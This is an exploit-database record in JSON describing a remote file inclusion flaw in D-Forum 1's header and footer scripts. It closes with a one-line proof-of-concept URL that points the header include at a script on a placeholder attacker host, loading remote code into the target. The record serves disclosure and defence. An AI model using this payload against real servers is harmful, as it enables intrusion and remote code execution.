{"lastseen": "2020-04-01T19:04:11", "references": [], "description": "\nD-Forum 1 - header Remote File Inclusion", "edition": 1, "reporter": "frog", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2003-02-18T00:00:00", "title": "D-Forum 1 - header Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-02-18T00:00:00", "id": "EXPLOITPACK:F3116AFFAF36220D6BC9EA5561FAECFC", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/6879/info\n\nD-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.\n\nUnder some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters. \n\nhttp://[target]/includes/header.php3?my_header=http://[attacker]/script.txt", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645503216}}